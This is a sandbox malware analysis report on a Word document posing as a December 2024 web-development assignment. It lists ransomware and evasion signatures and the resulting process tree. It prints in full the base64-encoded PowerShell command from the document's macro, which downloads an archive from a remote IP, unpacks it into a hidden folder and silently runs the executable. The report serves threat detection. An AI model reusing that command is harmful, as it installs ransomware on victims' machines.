Windows
Analysis Report
em_webdev_assignment_dec2024.doc
Overview
General Information
Detection
Score | 100
---|---
Range | 0 - 100
Whitelisted | false
Confidence | 100%
Signatures
Malicious encrypted Powershell command line found
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Encrypted powershell cmdline option found
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Office process queries suspicious COM object (likely to drop second stage)
Powershell drops PE file
Sigma detected: Net WebClient Casing Anomalies
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes a notice file (html or txt) to demand a ransom
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Execution of Powershell with Base64
Uses code obfuscation techniques (call, push, ret)
Classification
- System is w10x64
- WINWORD.EXE (PID: 1620 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
  - powershell.exe (PID: 7268 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgAwADgALgAyADAANgAuADEAOQA1AC8AZAAvAGEAcwBzAGkAZwBuAG0AZQBuAHQALgB6AGkAcAAiADsAJABwAGEAdABoACAAPQAgACIAQwA6AFwAVQBzAGUAcgBzAFwAJABlAG4AdgA6AHUAcwBlAHIAbgBhAG0AZQBcAHAANAB5AHgAMAByAGwAMABzADMAIgA7AG0AawBkAGkAcgAgACQAcABhAHQAaAA7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAE4AYQBtAGUAIABBAHQAdAByAGkAYgB1AHQAZQBzACAALQBWAGEAbAB1AGUAIAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAEEAdAB0AHIAaQBiAHUAdABlAHMAXQA6ADoASABpAGQAZABlAG4AKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABwAGEAdABoACAAKwAgACIAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgApADsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAIgAkAHAAYQB0AGgAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIAAiACQAcABhAHQAaABcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkAIgA7AEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgACIAJABwAGEAdABoAFwAYQBzAHMAaQBnAG4AbQBlAG4AdAAoADIAKQBcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABwAGEAdABoACIAOwBjAGQAIAAkAHAAYQB0AGgAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgByAHUAbgAuAGUAeABlACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA== MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  - conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - run.exe (PID: 7724 cmdline: "C:\Users\user\p4yx0rl0s3\run.exe" MD5: CD860C78E0374DEC3A2B1A73507FCE4A)
  - conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - cmd.exe (PID: 7804 cmdline: "cmd" /c start "" "C:\Users\user\p4yx0rl0s3\note.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - notepad.exe (PID: 7928 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\p4yx0rl0s3\note.txt MD5: 27F71B12CB585541885A31BE22F61C83)
- run.exe (PID: 5740 cmdline: "C:\Users\user\p4yx0rl0s3\run.exe" MD5: CD860C78E0374DEC3A2B1A73507FCE4A)
  - conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - cmd.exe (PID: 7240 cmdline: "cmd" /c start "" "C:\Users\user\p4yx0rl0s3\note.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - notepad.exe (PID: 7388 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\p4yx0rl0s3\note.txt MD5: 27F71B12CB585541885A31BE22F61C83)
- run.exe (PID: 5104 cmdline: "C:\Users\user\p4yx0rl0s3\run.exe" MD5: CD860C78E0374DEC3A2B1A73507FCE4A)
  - conhost.exe (PID: 7564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - cmd.exe (PID: 7660 cmdline: "cmd" /c start "" "C:\Users\user\p4yx0rl0s3\note.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - notepad.exe (PID: 7692 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\p4yx0rl0s3\note.txt MD5: 27F71B12CB585541885A31BE22F61C83)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | 
System Summary
---
Source: | Author: Florian Roth (Nextron Systems)